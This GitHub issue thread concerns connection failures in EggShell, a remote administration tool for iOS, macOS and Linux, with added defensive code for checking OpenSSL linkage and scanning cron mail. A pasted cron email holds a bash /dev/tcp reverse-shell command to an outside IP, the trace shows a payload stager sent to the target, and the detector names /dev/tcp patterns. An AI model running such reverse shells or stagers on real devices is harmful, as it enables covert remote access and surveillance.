lucasjacks0n / EggShell

iOS/macOS/Linux Remote Administration Tool
GNU General Public License v2.0

Cannot get past 'Establishing Secure Connection...' #83

Open hsaevol opened 6 years ago

hsaevol commented 6 years ago

Hello, I am using the current build on Linux. When I try to connect my iOS 11.0.3 device I get hung up at 'Establishing Secure Connection...'. I have traced the execution and pasted it below. Any suggestions? Need help.

[*] SET LPORT (Leave blank for 4444)>
server.py(59): if not lport:
server.py(60): lport = 4444
server.py(61): try:
server.py(62): lport = int(lport)
server.py(66): if lport < 1024:
server.py(69): break
server.py(70): h.info_general("LPORT = " + str(lport))
--- modulename: helper, funcname: info_general
helper.py(32): print "{0}[*] {1}{2}".format(COLOR_INFO,WHITE,string)
[*] LPORT = 4444
server.py(71): self.host = socket.gethostbyname(lhost)
server.py(72): self.port = lport
server.py(73): return True
eggshell.py(54): server.start_single_handler()
--- modulename: server, funcname: start_single_handler
server.py(79): session = self.listen_for_stager()
--- modulename: server, funcname: listen_for_stager
server.py(142): identification_shell_command = 'com=$(uname -p); if [ $com != "unknown" ]; then echo $com; else uname; fi\n'
server.py(145): s = socket.socket()
--- modulename: socket, funcname: __init__
socket.py(190): if _sock is None:
socket.py(191): _sock = _realsocket(family, type, proto)
socket.py(192): self._sock = _sock
socket.py(193): for method in _delegate_methods:
socket.py(194): setattr(self, method, getattr(_sock, method))
socket.py(193): for method in _delegate_methods:
socket.py(194): setattr(self, method, getattr(_sock, method))
socket.py(193): for method in _delegate_methods:
socket.py(194): setattr(self, method, getattr(_sock, method))
socket.py(193): for method in _delegate_methods:
socket.py(194): setattr(self, method, getattr(_sock, method))
socket.py(193): for method in _delegate_methods:
socket.py(194): setattr(self, method, getattr(_sock, method))
socket.py(193): for method in _delegate_methods:
socket.py(194): setattr(self, method, getattr(_sock, method))
socket.py(193): for method in _delegate_methods:
server.py(146): s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
--- modulename: socket, funcname: meth
socket.py(228): return getattr(self._sock,name)(*args)
server.py(147): s.bind(('0.0.0.0', self.port))
--- modulename: socket, funcname: meth
socket.py(228): return getattr(self._sock,name)(*args)
server.py(148): s.listen(1)
--- modulename: socket, funcname: meth
socket.py(228): return getattr(self._sock,name)(*args)
server.py(149): if self.is_multi == False:
server.py(150): h.info_general("Listening on port "+str(self.port)+"...")
--- modulename: helper, funcname: info_general
helper.py(32): print "{0}[*] {1}{2}".format(COLOR_INFO,WHITE,string)
[*] Listening on port 4444...
server.py(151): try:
server.py(152): conn, addr = s.accept()
--- modulename: socket, funcname: accept
socket.py(206): sock, addr = self._sock.accept()
socket.py(207): return _socketobject(_sock=sock), addr
--- modulename: socket, funcname: __init__
socket.py(190): if _sock is None:
socket.py(192): self._sock = _sock
socket.py(193): for method in _delegate_methods:
socket.py(194): setattr(self, method, getattr(_sock, method))
socket.py(193): for method in _delegate_methods:
socket.py(194): setattr(self, method, getattr(_sock, method))
socket.py(193): for method in _delegate_methods:
socket.py(194): setattr(self, method, getattr(_sock, method))
socket.py(193): for method in _delegate_methods:
socket.py(194): setattr(self, method, getattr(_sock, method))
socket.py(193): for method in _delegate_methods:
socket.py(194): setattr(self, method, getattr(_sock, method))
socket.py(193): for method in _delegate_methods:
socket.py(194): setattr(self, method, getattr(_sock, method))
socket.py(193): for method in _delegate_methods:
server.py(157): hostAddress = addr[0]
server.py(158): if self.is_multi == False:
server.py(159): h.info_general("Connecting to "+hostAddress)
--- modulename: helper, funcname: info_general
helper.py(32): print "{0}[*] {1}{2}".format(COLOR_INFO,WHITE,string)
[*] Connecting to 192.168.01.01
server.py(160): conn.send(identification_shell_command)
server.py(161): device_arch = conn.recv(128).strip()
server.py(162): if not device_arch:
server.py(165): try:
server.py(166): bash_stager, executable = self.craft_payload(device_arch)
--- modulename: server, funcname: craft_payload
server.py(92): if not self.host:
server.py(94): if not self.port:
server.py(96): payload_parameter = h.b64(json.dumps({"ip":self.host,"port":self.port,"debug":1}))
--- modulename: __init__, funcname: dumps
__init__.py(240): if (not skipkeys and ensure_ascii and
__init__.py(241): check_circular and allow_nan and
__init__.py(242): cls is None and indent is None and separators is None and
__init__.py(243): encoding == 'utf-8' and default is None and not sort_keys and not kw):
__init__.py(244): return _default_encoder.encode(obj)
--- modulename: encoder, funcname: encode
encoder.py(194): if isinstance(o, basestring):
encoder.py(207): chunks = self.iterencode(o, _one_shot=True)
--- modulename: encoder, funcname: iterencode
encoder.py(222): if self.check_circular:
encoder.py(223): markers = {}
encoder.py(226): if self.ensure_ascii:
encoder.py(227): _encoder = encode_basestring_ascii
encoder.py(230): if self.encoding != 'utf-8':
encoder.py(236): def floatstr(o, allow_nan=self.allow_nan,
encoder.py(237): _repr=FLOAT_REPR, _inf=INFINITY, _neginf=-INFINITY):
encoder.py(259): if (_one_shot and c_make_encoder is not None
encoder.py(260): and self.indent is None and not self.sort_keys):
encoder.py(261): _iterencode = c_make_encoder(
encoder.py(262): markers, self.default, _encoder, self.indent,
encoder.py(263): self.key_separator, self.item_separator, self.sort_keys,
encoder.py(264): self.skipkeys, self.allow_nan)
encoder.py(270): return _iterencode(o, 0)
encoder.py(208): if not isinstance(chunks, (list, tuple)):
encoder.py(210): return ''.join(chunks)
--- modulename: helper, funcname: b64
helper.py(52): return base64.b64encode(s)
--- modulename: base64, funcname: b64encode
base64.py(54): encoded = binascii.b2a_base64(s)[:-1]
base64.py(55): if altchars is not None:
base64.py(57): return encoded
server.py(97): if device_arch in self.macos_architectures:
server.py(110): elif device_arch in self.ios_architectures:
server.py(111): if self.is_multi == False:
server.py(112): h.info_general("Detected iOS")
--- modulename: helper, funcname: info_general
helper.py(32): print "{0}[*] {1}{2}".format(COLOR_INFO,WHITE,string)
[*] Detected iOS
server.py(113): f = open("resources/esplios", "rb")
server.py(114): payload = f.read()
server.py(115): f.close()
server.py(120): "/tmp/espl "+payload_parameter+" 2>/dev/null &\n"
server.py(121): return (instructions,payload)
server.py(172): if self.is_multi == False:
server.py(173): h.info_general("Sending Payload")
--- modulename: helper, funcname: info_general
helper.py(32): print "{0}[*] {1}{2}".format(COLOR_INFO,WHITE,string)
[*] Sending Payload
server.py(174): conn.send(bash_stager)
server.py(175): conn.send(executable)
server.py(176): conn.close()
--- modulename: socket, funcname: close
socket.py(199): self._sock = _closedsocket()
socket.py(200): dummy = self._sock._dummy
socket.py(201): for method in _delegate_methods:
socket.py(202): setattr(self, method, dummy)
socket.py(201): for method in _delegate_methods:
socket.py(202): setattr(self, method, dummy)
socket.py(201): for method in _delegate_methods:
socket.py(202): setattr(self, method, dummy)
socket.py(201): for method in _delegate_methods:
socket.py(202): setattr(self, method, dummy)
socket.py(201): for method in _delegate_methods:
socket.py(202): setattr(self, method, dummy)
socket.py(201): for method in _delegate_methods:
socket.py(202): setattr(self, method, dummy)
socket.py(201): for method in _delegate_methods:
server.py(177): if self.is_multi == False:
server.py(178): h.info_general("Establishing Secure Connection...")
--- modulename: helper, funcname: info_general
helper.py(32): print "{0}[*] {1}{2}".format(COLOR_INFO,WHITE,string)
[*] Establishing Secure Connection...
server.py(179): try:
server.py(180): return self.listen_for_executable_payload(s)
--- modulename: server, funcname: listen_for_executable_payload
server.py(191): ssl_con, hostAddress = s.accept()
--- modulename: socket, funcname: accept
socket.py(206): sock, addr = self._sock.accept()

LiesRapas commented 6 years ago

Yea, me neither...

lucasjacks0n commented 6 years ago

are you running eggshell inside of a virtual machine?

LiesRapas commented 6 years ago

Nah, I'm running it on a Raspberry Pi with Kali Linux, but I encountered the same issues on macOS High Sierra when I installed it on my MacBook Pro.

ghost commented 6 years ago

@neoneggplant it's because the OpenSSL libraries are not being statically linked in the Xcode project properly. It's dynamic, and if the target hasn't installed OpenSSL via MacPorts or brew then the dylibs aren't available. I have this working now in an Xcode project; I'll tidy it and put in a PR.

Same as issue 78 and all the other "establishing encrypted connection" bugs... it's because the binary is failing to run on the target.
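The linkage problem described in the comment above can be confirmed from the binary's own load commands rather than by trial on a target. The following is an added example, not EggShell's code: it parses the output of `otool -L` and reports which dependencies are resolved from a MacPorts or Homebrew prefix, which a stock macOS install does not have. The sample output, the path `resources/esplmacos` and the prefix lists are constructed for the example; `inspect_binary` runs the real `otool` and therefore only works on macOS.

```python
"""Inspect a Mach-O binary's dynamic library dependencies (from `otool -L`)
and report any that resolve to a third-party package prefix.

A binary that links libssl/libcrypto from /opt/local or /usr/local only runs
on hosts where MacPorts or Homebrew OpenSSL is installed; elsewhere dyld
refuses to load it, and the listener on the other end just waits forever.
Added example for this thread, not part of the EggShell project.
"""
import re
import subprocess

# Constructed sample in the shape of `otool -L resources/esplmacos` output
# for a build that links OpenSSL dynamically from a MacPorts prefix.
SAMPLE_OTOOL_OUTPUT = (
    "resources/esplmacos:\n"
    "\t/opt/local/lib/libssl.1.0.0.dylib (compatibility version 1.0.0, current version 1.0.0)\n"
    "\t/opt/local/lib/libcrypto.1.0.0.dylib (compatibility version 1.0.0, current version 1.0.0)\n"
    "\t/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1252.0.0)\n"
)

# Assumed prefix lists: libraries shipped with macOS versus package managers.
SYSTEM_PREFIXES = ("/usr/lib/", "/System/Library/")
THIRD_PARTY_PREFIXES = ("/opt/local/", "/usr/local/", "/opt/homebrew/")
OPENSSL_LIB = re.compile(r"/lib(ssl|crypto)[^/]*\.dylib$")


def parse_otool(output):
    """Return the dependency install names from `otool -L` text.

    The first line names the binary itself; each following line is an
    indented install name followed by version info in parentheses.
    """
    deps = []
    for line in output.splitlines()[1:]:
        line = line.strip()
        if not line:
            continue
        deps.append(line.split(" (", 1)[0])
    return deps


def classify(install_name):
    """Label an install name as 'system', 'third-party' or 'other' (e.g. @rpath)."""
    if install_name.startswith(SYSTEM_PREFIXES):
        return "system"
    if install_name.startswith(THIRD_PARTY_PREFIXES):
        return "third-party"
    return "other"


def external_openssl(deps):
    """Return the OpenSSL libraries that would be loaded from a third-party prefix."""
    return [d for d in deps if classify(d) == "third-party" and OPENSSL_LIB.search(d)]


def inspect_binary(path):
    """Run `otool -L` on a real file (macOS only) and report external OpenSSL deps."""
    out = subprocess.run(["otool", "-L", path], capture_output=True,
                         text=True, check=True).stdout
    return external_openssl(parse_otool(out))


if __name__ == "__main__":
    deps = parse_otool(SAMPLE_OTOOL_OUTPUT)
    for dep in deps:
        print("{:12} {}".format(classify(dep), dep))
    print("external OpenSSL:", external_openssl(deps))
```

A binary that reports only `system` dependencies (or none matching libssl/libcrypto) has OpenSSL statically linked and will load on a stock host; a `third-party` hit is the case this thread is about.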

LiesRapas commented 6 years ago

Thanks a lot! It worked when I installed OpenSSL!

hsaevol commented 6 years ago

Looking forward to exploring all the neat features!

lucasjacks0n commented 6 years ago

@hhdevteam Awesome that you found that, I was having a hard time recreating the issue!

lucasjacks0n commented 6 years ago

Can anyone who is having the issue let me know if this works? I believe the library is now statically linked in esplmacos https://github.com/neoneggplant/EggShell/tree/dev

keshaipad commented 6 years ago

@neoneggplant Something wrong with that one "dev" branch I think...

Initializing server...
Traceback (most recent call last):
  File "eggshell.py", line 158, in <module>
    eggshell = EggShell()
  File "eggshell.py", line 11, in __init__
    self.server = server.Server()
  File "/root/eggShellDev/modules/server.py", line 21, in __init__
    self.modules_python = self.import_modules("modules/commands/python")
  File "/root/eggShellDev/modules/server.py", line 30, in import_modules
    for mod in os.listdir(path):
OSError: [Errno 2] No such file or directory: 'modules/commands/python'

lucasjacks0n commented 6 years ago

@keshaipad sorry about that, just pushed a fix, try now :)

keshaipad commented 6 years ago

Hehe. There is now another problem. I try to connect, but nothing happens. And when I exit from MultiHandler, I get some error about SSL:

Menu:

    1): Start Server
    2): Start MultiHandler
    3): Create Payload
    4): Exit

EggShell> 2
[*] SET LHOST (Leave blank for 125.5.247.62)>
[*] LHOST = 125.5.247.62
[*] SET LPORT (Leave blank for 4444)>2525
[*] LPORT = 2525
[*] Listening on port 2525...
[*] Type "help" for commands

MultiHandler> exit
[*] Cleaning up...
[*] SSL error: [Errno 8] _ssl.c:510: EOF occurred in violation of protocol end start multihandler

lucasjacks0n commented 6 years ago

What python/ssl version do you have installed?

$ python --version
$ openssl version

keshaipad commented 6 years ago

Linux: (server) Python 2.7.6 OpenSSL 1.0.1f 6 Jan 2014

Mac: (client) Python 2.7.10 OpenSSL 0.9.8zg 14 july 2015

Also, in the Mac terminal I find a lot of mails like this:

From mactest@macTests-MacBook-Pro.local  Wed Apr 11 03:13:03 2018
X-Original-To: mactest
Delivered-To: mactest@macTests-MacBook-Pro.local
From: mactest@macTests-MacBook-Pro.local (Cron Daemon)
To: mactest@macTests-MacBook-Pro.local
Subject: Cron <mactest@macTests-MacBook-Pro> bash &> /dev/tcp/125.5.247.62/2020 0>&1 2>/dev/null
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=mactest>
X-Cron-Env: <USER=mactest>
X-Cron-Env: <HOME=/Users/mactest>
Date: Wed, 11 Apr 2018 03:13:02 -0700 (PDT)

/bin/sh: connect: Connection refused
/bin/sh: /dev/tcp/125.5.247.62/2020: Connection refused
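The cron mail pasted above is a useful artefact from the defender's side: every time the scheduled job runs, the Cron Daemon mails the user the command line and its stderr, so the local mail spool records both the persistence entry and the callback destination. The following is an added example, not part of EggShell or of this thread. It scans an mbox-format spool for cron subjects whose command opens a `/dev/tcp/<host>/<port>` connection, extracts user, destination and date, and counts the "Connection refused" lines (a job that keeps failing is still a scheduled beacon). The sample spool is constructed; it uses the documentation address 192.0.2.10 and the host name `host.local` in place of the real values above, and the detector handles any host and port, not just the ones in the thread.

```python
"""Scan an mbox-format mail spool for cron job output whose command line
connects through bash's /dev/tcp/<host>/<port> pseudo-device.

Added detection example for this thread; not EggShell code. Cron mails the
job's stderr to the owning user, so a failing reverse-connect job leaves
one message per run in /var/mail/<user> (path assumed, platform dependent).
"""
import re

# Constructed sample in the shape of the cron mail shown in the thread.
# 192.0.2.10 is a documentation-range placeholder, not the thread's real IP.
SAMPLE_MBOX = """\
From mactest@host.local  Wed Apr 11 03:13:03 2018
From: mactest@host.local (Cron Daemon)
To: mactest@host.local
Subject: Cron <mactest@host> bash &> /dev/tcp/192.0.2.10/2020 0>&1 2>/dev/null
Date: Wed, 11 Apr 2018 03:13:02 -0700 (PDT)

/bin/sh: connect: Connection refused
/bin/sh: /dev/tcp/192.0.2.10/2020: Connection refused

From mactest@host.local  Wed Apr 11 03:14:03 2018
From: mactest@host.local (Cron Daemon)
To: mactest@host.local
Subject: Cron <mactest@host> /usr/bin/find /tmp -mtime +7 -delete
Date: Wed, 11 Apr 2018 03:14:02 -0700 (PDT)

"""

# Vixie-cron subject format: "Cron <user@host> command"
CRON_SUBJECT = re.compile(r"^Subject: Cron <(?P<user>[^>]+)> (?P<cmd>.*)$", re.M)
# bash network pseudo-device: /dev/tcp/HOST/PORT (host may be an IP or a name)
DEV_TCP = re.compile(r"/dev/tcp/(?P<host>[^/\s]+)/(?P<port>\d{1,5})")
DATE_HEADER = re.compile(r"^Date: (?P<date>.*)$", re.M)


def split_messages(mbox_text):
    """Split mbox text into messages on the 'From ' envelope separator.

    Header lines such as 'From: ...' contain a colon, so they do not split.
    """
    parts = re.split(r"^From ", mbox_text, flags=re.M)
    return [p for p in parts if p.strip()]


def find_dev_tcp_cron_jobs(mbox_text):
    """Return one finding per cron mail whose command uses /dev/tcp."""
    findings = []
    for msg in split_messages(mbox_text):
        subject = CRON_SUBJECT.search(msg)
        if not subject:
            continue
        target = DEV_TCP.search(subject.group("cmd"))
        if not target:
            continue
        date = DATE_HEADER.search(msg)
        findings.append({
            "user": subject.group("user"),
            "host": target.group("host"),
            "port": int(target.group("port")),
            "date": date.group("date") if date else None,
            "command": subject.group("cmd"),
            # stderr of a failed connect; >0 means the listener was down,
            # but the job is still scheduled and will retry.
            "refused_lines": msg.count("Connection refused"),
        })
    return findings


def scan_spool(path):
    """Read a real spool file (e.g. /var/mail/<user>) and report findings."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_dev_tcp_cron_jobs(fh.read())


if __name__ == "__main__":
    for f in find_dev_tcp_cron_jobs(SAMPLE_MBOX):
        print("{date}: {user} -> {host}:{port} ({refused_lines} refused)".format(**f))
```

A hit here points at a crontab entry to remove and a destination to block or watch; the same regexes applied directly to `crontab -l` output for each user catch the entry even before cron has mailed anything.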

computer00776 commented 6 years ago

So do we need to install OpenSSL on the target? If so, can someone tell me the command to do so please. Thanks guys.

lucasjacks0n commented 6 years ago

The dev branch should have the esplmacos SSL library statically linked.

computer00776 commented 6 years ago

Sorry buddy, still not working. Stuck on establishing secure connection even with the tree/dev version.

lucasjacks0n commented 6 years ago

Is the target a Linux machine? OpenSSL will have to be installed.

computer00776 commented 6 years ago

No, it's a Mac machine. Do I still need to install OpenSSL?

molomilo commented 6 years ago

Hello, thank you for your EggShell. I still haven't got a solution for the establishing secure connection problem. Anything new? I am on Kali connecting to an iPhone 4 on 7.1.2, jailbroken. OpenSSL is installed on the iPhone but nothing works. Even the version on dev doesn't work. Need help.

KodiacSecurity commented 6 years ago

As stated above, the SSL library is statically linked in the dev branch. It solves the problem. Tested on Sierra, Yosemite and Snow Leopard.

If not, fall back to https://github.com/neoneggplant/EggShell/tree/dd9f71eb3cc59ebb2d0e3bf27fa6affa0f47b993

lucasjacks0n commented 6 years ago

EggShell iOS payload now supports iOS 11 (added platform-application entitlement), fixes iOS stage where it gets stuck at "Establishing Secure Connection". I have tested on my iPhone 7 11.3.1. Can anyone confirm this on their iOS device?

shegner commented 6 years ago

I connect with Kali Linux (up to date) to an older iPad with iOS 9.3.5 (jailbroken, MTerminal). I tried the master and dev branches. No luck. EggShell hangs on 'Establishing Secure Connection...'. So I tried the older version as KodiacSecurity proposed. That works, but only a few commands are working, like sysinfo or alert. Camera, open app etc. are NOT working. Is there a version I can use so that taking pictures and opening apps work?